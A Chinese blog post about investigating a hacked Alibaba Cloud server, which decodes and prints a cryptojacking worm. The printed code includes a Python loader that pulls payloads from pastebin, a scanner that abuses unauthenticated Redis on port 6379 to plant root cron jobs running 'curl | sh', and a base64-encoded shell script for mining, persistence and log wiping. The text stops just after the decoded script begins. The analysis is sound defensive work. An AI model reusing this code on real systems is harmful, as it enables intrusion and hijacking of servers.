记一次公司阿里云被黑

最新推荐文章于 2025-06-27 16:01:07 发布
置顶 最新推荐文章于 2025-06-27 16:01:07 发布
阅读量1.5w 收藏 12
点赞数 7
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/FYuu95100/article/details/82351619

记一次公司阿里云被黑

1.发现问题

  公司阿里云连续四条预警,怀疑是被人黑了,并且用python程序干坏事,于是登录公司阿里云查看一波。

    进程异常行为-Linux异常文件下载 
    敏感文件篡改-Linux共享库文件预加载配置文件可疑篡改 
    恶意进程(云查杀)-挖矿程序 
    进程异常行为-Python应用执行异常指令

2.找到黑客程序

  因为有个进程异常行为-Python应用执行异常指令先看看python程序相关进程有没有干坏事

ps -aux | grep python

  结果发现三个相关程序

grep --color=auto python

/usr/bin/pytho -Es /usr/sbin/tuned -l -P

python -c import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))
  • 第一个是 ps -aux | grep python 查询是良民不管他
  • 第二个执行了 /usr/sbin/tuned python文件 vim /usr/sbin/tuned看了一下这个文件感觉没有什么问题,但是由于我们服务器程序并没有用的python的地方,良民也给他干掉,把进程杀了
  • 第三个一看就感觉不是好东西,先杀再说

3.分析黑客程序

  杀完之后研究一下这个东西到底干了什么,看命令是通过python程序执行了一个被base64加密的一个程序,下面把I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz这个base64解码一下看看是什么东西。
  百度base64 解码随便找一个在线base64解码的看看干了什么事情,发现解码之后是一个python程序

#coding: utf-8
import urllib
import base64

d= 'https://pastebin.com/raw/nYBpuAxT'
try:
    page=base64.b64decode(urllib.urlopen(d).read())
    exec(page)
except:
    pass

  很明显这个python程序拿到了这个https://pastebin.com/raw/nYBpuAxT这个地址的内容并且base64解码,然后运行这个程序,下面看看这个是个什么东西

IyEgL3Vzci9iaW4vZW52IHB5dGhvbgojY29kaW5nOiB1dGYtOAoKaW1wb3J0IHRocmVhZGluZwppbXBvcnQgc29ja2V0CmZyb20gcmUgaW1wb3J0IGZpbmRhbGwKaW1wb3J0IGh0dHBsaWIKCklQX0xJU1QgPSBbXQoKY2xhc3Mgc2Nhbm5lcih0aHJlYWRpbmcuVGhyZWFkKToKICAgIHRsaXN0ID0gW10KICAgIG1heHRocmVhZHMgPSAxMDAKICAgIGV2bnQgPSB0aHJlYWRpbmcuRXZlbnQoKQogICAgbGNrID0gdGhyZWFkaW5nLkxvY2soKQoKICAgIGRlZiBfX2luaXRfXyhzZWxmLGhvc3QpOgogICAgICAgIHRocmVhZGluZy5UaHJlYWQuX19pbml0X18oc2VsZikKICAgICAgICBzZWxmLmhvc3QgPSBob3N0CiAgICBkZWYgcnVuKHNlbGYpOgogICAgICAgIHRyeToKICAgICAgICAgICAgcyA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX1NUUkVBTSkKICAgICAgICAgICAgcy5zZXR0aW1lb3V0KDUpCiAgICAgICAgICAgIHMuY29ubmVjdCgoc2VsZi5ob3N0LCA2Mzc5KSkKICAgICAgICAgICAgcy5zZW5kKCdzZXQgdGlnaHRzb2Z0ICJcXG5cXG5cXG4qLzEgKiAqICogKiByb290IGN1cmwgLWZzU0wgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3hiWTdwNVRifHNoXFxuXFxuXFxuIlxyXG4nKQogICAgICAgICAgICBzLnNlbmQoJ2NvbmZpZyBzZXQgZGlyIC9ldGMvY3Jvbi5kXHJcbicpCiAgICAgICAgICAgIHMuc2VuZCgnY29uZmlnIHNldCBkYmZpbGVuYW1lIHJvb3RcclxuJykKICAgICAgICAgICAgcy5zZW5kKCdzYXZlXHJcbicpCiAgICAgICAgICAgIHMuY2xvc2UoKQogICAgICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgICAgIHBhc3MKICAgICAgICBzY2FubmVyLmxjay5hY3F1aXJlKCkKICAgICAgICBzY2FubmVyLnRsaXN0LnJlbW92ZShzZWxmKQogICAgICAgIGlmIGxlbihzY2FubmVyLnRsaXN0KSA8IHNjYW5uZXIubWF4dGhyZWFkczoKICAgICAgICAgICAgc2Nhbm5lci5ldm50LnNldCgpCiAgICAgICAgICAgIHNjYW5uZXIuZXZudC5jbGVhcigpCiAgICAgICAgc2Nhbm5lci5sY2sucmVsZWFzZSgpCgogICAgZGVmIG5ld3RocmVhZChob3N0KToKICAgICAgICBzY2FubmVyLmxjay5hY3F1aXJlKCkKICAgICAgICBzYyA9IHNjYW5uZXIoaG9zdCkKICAgICAgICBzY2FubmVyLnRsaXN0LmFwcGVuZChzYykKICAgICAgICBzY2FubmVyLmxjay5yZWxlYXNlKCkKICAgICAgICBzYy5zdGFydCgpCgogICAgbmV3dGhyZWFkID0gc3RhdGljbWV0aG9kKG5ld3RocmVhZCkKCmRlZiBnZXRfaXBfbGlzdCgpOgogICAgdHJ5OgogICAgICAgIHVybCA9ICdpZGVudC5tZScKICAgICAgICBjb25uID0gaHR0cGxpYi5IVFRQQ29ubmVjdGlvbih1cmwsIHBvcnQ9ODAsIHRpbWVvdXQ9MTApCiAgICAgICAgcmVxID0gY29ubi5yZXF1ZXN0KG1ldGhvZD0nR0VUJywgdXJsPScvJywgKQogICAgICAgIHJlc3VsdCA9IGNvbm4uZ2V0cmVzcG9uc2UoKQogICAgICAgIGlwMiA9IHJlc3VsdC5yZWFkKCkKICAgICAgICBpcHMyID0gZmluZGFsbChyJ1xkKy5cZCsuJywgaXAyKVswXQogICAgICAgIGZvciBpIGluIHJhbmdlKDAsIDI1NSk6CiAgICAgICAgICAgIGlwX2xpc3QxID0gKGlwczIgKyAoc3RyKGkpKSkKICAgICAgICAgICAgZm9yIGcgaW4gcmFuZ2UoMCwgMjU1KToKICAgICAgICAgICAgICAgIElQX0xJU1QuYXBwZW5kKGlwX2xpc3QxICsgJy4nICsgKHN0cihnKSkpCiAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgIHBhc3MKCmRlZiBydW5Qb3J0c2NhbigpOgogICAgZ2V0X2lwX2xpc3QoKQogICAgZm9yIGhvc3QgaW4gSVBfTElTVDoKICAgICAgICBzY2FubmVyLmxjay5hY3F1aXJlKCkKICAgICAgICBpZiBsZW4oc2Nhbm5lci50bGlzdCkgPj0gc2Nhbm5lci5tYXh0aHJlYWRzOgogICAgICAgICAgICBzY2FubmVyLmxjay5yZWxlYXNlKCkKICAgICAgICAgICAgc2Nhbm5lci5ldm50LndhaXQoKQogICAgICAgIGVsc2U6CiAgICAgICAgICAgIHNjYW5uZXIubGNrLnJlbGVhc2UoKQogICAgICAgIHNjYW5uZXIubmV3dGhyZWFkKGhvc3QpCiAgICBmb3IgdCBpbiBzY2FubmVyLnRsaXN0OgogICAgICAgIHQuam9pbigpCgppZiBfX25hbWVfXyA9PSAiX19tYWluX18iOgogICAgcnVuUG9ydHNjYW4oKQoK

  base64解码之后果然还是应该python程序

#! /usr/bin/env python
#coding: utf-8

import threading
import socket
from re import findall
import httplib

IP_LIST = []

class scanner(threading.Thread):
    tlist = []
    maxthreads = 100
    evnt = threading.Event()
    lck = threading.Lock()

    def __init__(self,host):
        threading.Thread.__init__(self)
        self.host = host
    def run(self):
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(5)
            s.connect((self.host, 6379))
            s.send('set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
            s.send('config set dir /etc/cron.d\r\n')
            s.send('config set dbfilename root\r\n')
            s.send('save\r\n')
            s.close()
        except Exception:
            pass
        scanner.lck.acquire()
        scanner.tlist.remove(self)
        if len(scanner.tlist) < scanner.maxthreads:
            scanner.evnt.set()
            scanner.evnt.clear()
        scanner.lck.release()

    def newthread(host):
        scanner.lck.acquire()
        sc = scanner(host)
        scanner.tlist.append(sc)
        scanner.lck.release()
        sc.start()

    newthread = staticmethod(newthread)

def get_ip_list():
    try:
        url = 'ident.me'
        conn = httplib.HTTPConnection(url, port=80, timeout=10)
        req = conn.request(method='GET', url='/', )
        result = conn.getresponse()
        ip2 = result.read()
        ips2 = findall(r'\d+.\d+.', ip2)[0]
        for i in range(0, 255):
            ip_list1 = (ips2 + (str(i)))
            for g in range(0, 255):
                IP_LIST.append(ip_list1 + '.' + (str(g)))
    except Exception:
        pass

def runPortscan():
    get_ip_list()
    for host in IP_LIST:
        scanner.lck.acquire()
        if len(scanner.tlist) >= scanner.maxthreads:
            scanner.lck.release()
            scanner.evnt.wait()
        else:
            scanner.lck.release()
        scanner.newthread(host)
    for t in scanner.tlist:
        t.join()

if __name__ == "__main__":
    runPortscan()

  这个程序就稍微复杂一点了,一点点看吧,先分析一下他写的这些方法

  • get_ip_list


      访问了http://ident.me 这个网址,我访问了一下,这个网址是用来获取被访问网址的ip的,拿到阿里云主机的ip了 ,通过正则拿到这个ip的前两位然后遍历后两位,比如我的ip是192.168.123.213,这个遍历出来一个 192.168.0.0 到 192.168.255.255的数组IP_LIST
  • scanner类


      这个类是继承了threading.Thread类的主要作用就是连接socket(6379)然后发送数据主要是set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n这个 定时执行从https://pastebin.com/raw/xbY7p5Tb拿下脚本并且执行


      这个程序主要的作用就是获取到本机ip并且拿到ip的前两位,然后穷举后两位连接端口6379并发送 定时执行从https://pastebin.com/raw/xbY7p5Tb拿下脚本的信息


      然后再分析一下这个https://pastebin.com/raw/xbY7p5Tb脚本的内容:
/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/uuYVPLXd|/usr/bin/base64 -d|/bin/bash

  从https://pastebin.com/raw/uuYVPLXd拿下内容并base64解密执行

IyEvYmluL2Jhc2gKU0hFTEw9L2Jpbi9zaApQQVRIPS91c3IvbG9jYWwvc2JpbjovdXNyL2xvY2FsL2Jpbjovc2JpbjovYmluOi91c3Ivc2JpbjovdXNyL2JpbgoKZnVuY3Rpb24ga2lsbHMoKSB7CnBraWxsIC1mIHNvdXJwbHVtCnBraWxsIHduVEtZZyAmJiBwa2lsbCBkZGcqICYmIHJtIC1yZiAvdG1wL2RkZyogJiYgcm0gLXJmIC90bXAvd25US1lnCnJtIC1yZiAvYm9vdC9ncnViL2RlYW1vbiAmJiBybSAtcmYgL2Jvb3QvZ3J1Yi9kaXNrX2dlbml1cwpybSAtcmYgL3RtcC8qaW5kZXhfYmFrKgpybSAtcmYgL3RtcC8qaHR0cGQuY29uZioKcm0gLXJmIC90bXAvKmh0dHBkLmNvbmYKcm0gLXJmIC90bXAvYTdiMTA0YzI3MApwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJtaW5lLm1vbmVyb3Bvb2wuY29tInxhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yLmNyeXB0by1wb29sLmZyOjgwODAifGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJ4bXIuY3J5cHRvLXBvb2wuZnI6MzMzMyJ8YXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgIm1vbmVyb2hhc2guY29tInxhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAiL3RtcC9hN2IxMDRjMjcwInxhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yLmNyeXB0by1wb29sLmZyOjY2NjYifGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJ4bXIuY3J5cHRvLXBvb2wuZnI6Nzc3NyJ8YXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgInhtci5jcnlwdG8tcG9vbC5mcjo0NDMifGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJzdHJhdHVtLmYycG9vbC5jb206ODg4OCJ8YXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgInhtcnBvb2wuZXUiIHwgYXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgInhtcmlnIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJ4bXJpZ0RhZW1vbiIgfCBhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yaWdNaW5lciIgfCBhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcGtpbGwgLWYgYmlvc2V0amVua2lucwpwa2lsbCAtZiBBblhxVi55YW0KcGtpbGwgLWYgeG1yaWdEYWVtb24KcGtpbGwgLWYgeG1yaWdNaW5lcgpwa2lsbCAtZiB4bXJpZwpwa2lsbCAtZiBMb29wYmFjawpwa2lsbCAtZiBhcGFjZWhhCnBraWxsIC1mIGNyeXB0b25pZ2h0CnBraWxsIC1mIHN0cmF0dW0KcGtpbGwgLWYgbWl4bmVyZHgKcGtpbGwgLWYgcGVyZm9ybWVkbApwa2lsbCAtZiBKbktpaEdqbgpwa2lsbCAtZiBpcnFiYTJhbmMxCnBraWxsIC1mIGlycWJhNXhuYzEKcGtpbGwgLWYgaXJxYm5jMQpwa2lsbCAtZiBpcjI5eGMxCnBraWxsIC1mIGNvbm5zCnBraWxsIC1mIGlycWJhbGFuY2UKcGtpbGwgLWYgY3J5cHRvLXBvb2wKcGtpbGwgLWYgbWluZXhtcgpwa2lsbCAtZiBYSm5Sagpwa2lsbCAtZiBOWExBaQpwa2lsbCAtZiBCSTV6agpwa2lsbCAtZiBhc2tkbGpscXcKcGtpbGwgLWYgbWluZXJkCnBraWxsIC1mIG1pbmVyZ2F0ZQpwa2lsbCAtZiBHdWFyZC5zaApwa2lsbCAtZiB5c2F5ZGgKcGtpbGwgLWYgYm9ubnMKcGtpbGwgLWYgZG9ubnMKcGtpbGwgLWYga3hqZApwa2lsbCAtZiBEdWNrLnNoCnBraWxsIC1mIGJvbm4uc2gKcGtpbGwgLWYgY29ubi5zaApwa2lsbCAtZiBrd29ya2VyMzQKcGtpbGwgLWYga3cuc2gKcGtpbGwgLWYgcHJvLnNoCnBraWxsIC1mIHBvbGtpdGQKcGtpbGwgLWYgYWNwaWQKcGtpbGwgLWYgaWNiNW8KcGtpbGwgLWYgbm9weGkKcGtpbGwgLWYgaXJxYmFsYW5jMQpwa2lsbCAtZiBtaW5lcmQKcGtpbGwgLWYgaTU4Ngpwa2lsbCAtZiBnZGRyCnBraWxsIC1mIG1zdHhtcgpwa2lsbCAtZiBkZGcuMjAxMQpwa2lsbCAtZiB3blRLWWcKcGtpbGwgLWYgZGVhbW9uCnBraWxsIC1mIGRpc2tfZ2VuaXVzCnBraWxsIC1mIHNvdXJwbHVtCnBraWxsIC1mIGJhc2h4CnBraWxsIC1mIGJhc2hnCnBraWxsIC1mIGJhc2hlCnBraWxsIC1mIGJhc2hmCnBraWxsIC1mIGJhc2hoCnBraWxsIC1mIFhiYXNoWQpwa2lsbCAtZiBsaWJhcGFjaGUKcm0gLXJmIC90bXAvaHR0cGQuY29uZgpybSAtcmYgL3RtcC9jb25uCnJtIC1yZiAvdG1wL3Jvb3Quc2ggL3RtcC9wb29scy50eHQgL3RtcC9saWJhcGFjaGUgL3RtcC9jb25maWcuanNvbiAvdG1wL2Jhc2hmIC90bXAvYmFzaGcgL3RtcC9saWJhcGFjaGUKcm0gLXJmIC90bXAvY29ubnMKcm0gLWYgL3RtcC9pcnEuc2gKcm0gLWYgL3RtcC9pcnFiYWxhbmMxCnJtIC1mIC90bXAvaXJxCnJtIC1mIC90bXAva3dvcmtlcmRzIC9iaW4va3dvcmtlcmRzIC9iaW4vY29uZmlnLmpzb24KbmV0c3RhdCAtYW5wIHwgZ3JlcCA2OS4yOC41NS44Njo0NDMgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAtRidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkKbmV0c3RhdCAtYW5wIHwgZ3JlcCAzMzMzIHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05Cm5ldHN0YXQgLWFucCB8IGdyZXAgNDQ0NCB8YXdrICd7cHJpbnQgJDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOQpuZXRzdGF0IC1hbnAgfCBncmVwIDU1NTUgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAtRidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkKbmV0c3RhdCAtYW5wIHwgZ3JlcCA2NjY2IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05Cm5ldHN0YXQgLWFucCB8IGdyZXAgNzc3NyB8YXdrICd7cHJpbnQgJDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOQpuZXRzdGF0IC1hbnAgfCBncmVwIDMzNDcgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAtRidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkKbmV0c3RhdCAtYW5wIHwgZ3JlcCAxNDQ0NCB8YXdrICd7cHJpbnQgJDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOQpuZXRzdGF0IC1hbnAgfCBncmVwIDUuMTk2LjIyNS4yMjIgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAtRidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkKeT0kKHBzIGF1eCB8IGdyZXAgLXYgZ3JlcCB8IGdyZXAga3dvcmtlcmRzIHwgd2MgLWwgKQppZiBbICR7eX0gLWVxIDAgXTt0aGVuCgluZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05CmZpCn0KCmZ1bmN0aW9uIHN5c3RlbSgpIHsKCWlmIFsgISAtZiAiL2Jpbi9odHRwZG5zIiBdOyB0aGVuCgkJY3VybCAtZnNTTCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvNjk4RDdrWlUgLW8gL2Jpbi9odHRwZG5zICYmIGNobW9kIDc1NSAvYmluL2h0dHBkbnMKCQlpZiBbICEgLWYgIi9iaW4vaHR0cGRucyIgXTsgdGhlbgoJCQl3Z2V0ICBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvNjk4RDdrWlUgLU8gL2Jpbi9odHRwZG5zICYmIGNobW9kIDc1NSAvYmluL2h0dHBkbnMKCQlmaQoJCXNlZCAtaSAnJGQnIC9ldGMvY3JvbnRhYiAmJiBlY2hvIC1lICIqICovNiAqICogKiByb290IC9iaW4vc2ggL2Jpbi9odHRwZG5zIiA+PiAvZXRjL2Nyb250YWIKCWZpCgkJCn0KCmZ1bmN0aW9uIHRvcCgpIHsKCWlmIFsgISAtZiAiL3Vzci9sb2NhbC9saWIvbGlibnRwLnNvIiBdOyB0aGVuCgkJY3VybCAtZnNTTCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNjUvMTUzNTU5NTQyN3gtMTQwNDgxNzcxMi5qcGcgLW8gL3Vzci9sb2NhbC9saWIvbGlibnRwLnNvICYmIGNobW9kIDc1NSAvdXNyL2xvY2FsL2xpYi9saWJudHAuc28KCQlpZiBbICEgLWYgIi91c3IvbG9jYWwvbGliL2xpYm50cC5zbyIgXTsgdGhlbgoJCQl3Z2V0IGh0dHA6Ly90aHlyc2kuY29tL3Q2LzM2NS8xNTM1NTk1NDI3eC0xNDA0ODE3NzEyLmpwZyAtTyAvdXNyL2xvY2FsL2xpYi9saWJudHAuc28gJiYgY2htb2QgNzU1IC91c3IvbG9jYWwvbGliL2xpYm50cC5zbwoJCWZpCglmaQoJaWYgWyAhIC1mICIvZXRjL2xkLnNvLnByZWxvYWQiIF07IHRoZW4KCQllY2hvIC91c3IvbG9jYWwvbGliL2xpYm50cC5zbyA+IC9ldGMvbGQuc28ucHJlbG9hZAoJZWxzZQoJCXNlZCAtaSAnJGQnIC9ldGMvbGQuc28ucHJlbG9hZCAmJiBlY2hvIC91c3IvbG9jYWwvbGliL2xpYm50cC5zbyA+PiAvZXRjL2xkLnNvLnByZWxvYWQKCWZpCgl0b3VjaCAtYWNtciAvYmluL3NoIC9ldGMvbGQuc28ucHJlbG9hZAoJdG91Y2ggLWFjbXIgL2Jpbi9zaCAvdXNyL2xvY2FsL2xpYi9saWJqZGsuc28KCXRvdWNoIC1hY21yIC9iaW4vc2ggL3Vzci9sb2NhbC9saWIvbGlibnRwLnNvCgllY2hvIDA+L3Zhci9zcG9vbC9tYWlsL3Jvb3QKCWVjaG8gMD4vdmFyL2xvZy93dG1wCgllY2hvIDA+L3Zhci9sb2cvc2VjdXJlCgllY2hvIDA+L3Zhci9sb2cvY3Jvbgp9CgpmdW5jdGlvbiBweXRob24oKSB7Cglub2h1cCBweXRob24gLWMgImltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKCdJMk52WkdsdVp6b2dkWFJtTFRnS2FXMXdiM0owSUhWeWJHeHBZZ3BwYlhCdmNuUWdZbUZ6WlRZMENncGtQU0FuYUhSMGNITTZMeTl3WVhOMFpXSnBiaTVqYjIwdmNtRjNMMjVaUW5CMVFYaFVKd3AwY25rNkNpQWdJQ0J3WVdkbFBXSmhjMlUyTkM1aU5qUmtaV052WkdVb2RYSnNiR2xpTG5WeWJHOXdaVzRvWkNrdWNtVmhaQ2dwS1FvZ0lDQWdaWGhsWXlod1lXZGxLUXBsZUdObGNIUTZDaUFnSUNCd1lYTnonKSkiID4vZGV2L251bGwgMj4mMSAmCgl0b3VjaCAvdG1wLy50bXBhCn0KCmZ1bmN0aW9uIGVjaG9jcm9uKCkgewoJZWNobyAtZSAiKi8xMCAqICogKiAqIHJvb3QgL2Jpbi9jaG1vZCA3NTUgL3Vzci9iaW4vY3VybCAmJiAvdXNyL2Jpbi9jdXJsIC1mc1NMIGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy94Ylk3cDVUYnxzaFxuIyMiID4gL2V0Yy9jcm9uLmQvcm9vdAoJZWNobyAtZSAiKi8zMCAqICogKiAqCS91c3IvYmluL2N1cmwgLWZzU0wgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3hiWTdwNVRifHNoXG4jIyIgPiAvdmFyL3Nwb29sL2Nyb24vcm9vdAoJbWtkaXIgLXAgL3Zhci9zcG9vbC9jcm9uL2Nyb250YWJzCgllY2hvIC1lICIqICovMTAgKiAqICoJL3Vzci9iaW4vY3VybCAtZnNTTCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcveGJZN3A1VGJ8c2hcbiMjIiA+IC92YXIvc3Bvb2wvY3Jvbi9jcm9udGFicy9yb290Cgl0b3VjaCAtYWNtciAvYmluL3NoIC9ldGMvY3Jvbi5kL3Jvb3QKCXRvdWNoIC1hY21yIC9iaW4vc2ggL3Zhci9zcG9vbC9jcm9uL2Nyb250YWJzCgl0b3VjaCAtYWNtciAvYmluL3NoIC92YXIvc3Bvb2wvY3Jvbi9yb290Cgl0b3VjaCAtYWNtciAvYmluL3NoIC92YXIvc3Bvb2wvY3Jvbi9jcm9udGFicy9yb290Cn0KCmZ1bmN0aW9uIGRvd25sb2FkcnVuKCkgewoJcHM9JChuZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHwgd2MgLWwpCglpZiBbICR7cHN9IC1lcSAwIF07dGhlbgoJCWlmIFsgISAtZiAiL3RtcC9rd29ya2VyZHMiIF07IHRoZW4KCQkJY3VybCAtZnNTTCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5NTEyN3gtMTQwNDc2NDI0Ny5qcGcgLW8gL3RtcC9rd29ya2VyZHMgJiYgY2htb2QgK3ggL3RtcC9rd29ya2VyZHMKCQkJaWYgWyAhIC1mICIvdG1wL2t3b3JrZXJkcyIgXTsgdGhlbgoJCQkJd2dldCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5NTEyN3gtMTQwNDc2NDI0Ny5qcGcgLU8gL3RtcC9rd29ya2VyZHMgJiYgY2htb2QgK3ggL3RtcC9rd29ya2VyZHMKCQkJZmkKCQkJCW5vaHVwIC90bXAva3dvcmtlcmRzID4vZGV2L251bGwgMj4mMSAmCgkJZWxzZQoJCQlub2h1cCAvdG1wL2t3b3JrZXJkcyA+L2Rldi9udWxsIDI+JjEgJgoJCWZpCglmaQp9CgpmdW5jdGlvbiBkb3dubG9hZHJ1bnhtKCkgewoJcG09JChuZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHwgd2MgLWwpCglpZiBbICR7cG19IC1lcSAwIF07dGhlbgoJCWlmIFsgISAtZiAiL2Jpbi9jb25maWcuanNvbiIgXTsgdGhlbgoJCQljdXJsIC1mc1NMIGh0dHA6Ly90aHlyc2kuY29tL3Q2LzM1OC8xNTM0NDk2MDIyeC0xNDA0NzY0NTgzLmpwZyAtbyAvYmluL2NvbmZpZy5qc29uICYmIGNobW9kICt4IC9iaW4vY29uZmlnLmpzb24KCQkJaWYgWyAhIC1mICIvYmluL2NvbmZpZy5qc29uIiBdOyB0aGVuCgkJCQl3Z2V0IGh0dHA6Ly90aHlyc2kuY29tL3Q2LzM1OC8xNTM0NDk2MDIyeC0xNDA0NzY0NTgzLmpwZyAtTyAvYmluL2NvbmZpZy5qc29uICYmIGNobW9kICt4IC9iaW4vY29uZmlnLmpzb24KCQkJZmkKCQlmaQoJCWlmIFsgISAtZiAiL2Jpbi9rd29ya2VyZHMiIF07IHRoZW4KCQkJY3VybCAtZnNTTCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5MTc5OHgtMTQwNDc2NDQyMC5qcGcgLW8gL2Jpbi9rd29ya2VyZHMgJiYgY2htb2QgK3ggL2Jpbi9rd29ya2VyZHMKCQkJaWYgWyAhIC1mICIvYmluL2t3b3JrZXJkcyIgXTsgdGhlbgoJCQkJd2dldCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5MTc5OHgtMTQwNDc2NDQyMC5qcGcgLU8gL2Jpbi9rd29ya2VyZHMgJiYgY2htb2QgK3ggL2Jpbi9rd29ya2VyZHMKCQkJZmkKCQkJCW5vaHVwIC9iaW4va3dvcmtlcmRzID4vZGV2L251bGwgMj4mMSAmCgkJZWxzZQoJCQlub2h1cCAvYmluL2t3b3JrZXJkcyA+L2Rldi9udWxsIDI+JjEgJgoJCWZpCglmaQp9Cgp1cGRhdGU9JCggY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0M0WmhRRnJIICkKaWYgWyAke3VwZGF0ZX14ID0gInVwZGF0ZSJ4IF07dGhlbgoJcm0gLXJmIC90bXAvbG9jayogL2Jpbi9rd29ya2VyZHMgL2Jpbi9jb25maWcuanNvbiAvdG1wL2t3b3JrZXJkcyAvcm9vdC9rd29ya2VyZHMKCWVjaG9jcm9uCmVsc2UKCWlmIFsgISAtZiAiL3RtcC8udG1wYSIgXTsgdGhlbgoJCXJtIC1yZiAvdG1wLy50bXAKCQlweXRob24KCWZpCglraWxscwoJZG93bmxvYWRydW4KCWVjaG9jcm9uCglzeXN0ZW0KCXRvcAoJc2xlZXAgMTAKCXBvcnQ9JChuZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHwgd2MgLWwpCglpZiBbICR7cG9ydH0gLWVxIDAgXTt0aGVuCgkJZG93bmxvYWRydW54bQoJZmkKZmkKIwoj

  base64解密后发现是这样一个shell,这个应该就是最终要干的坏事了

#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

function kills() {
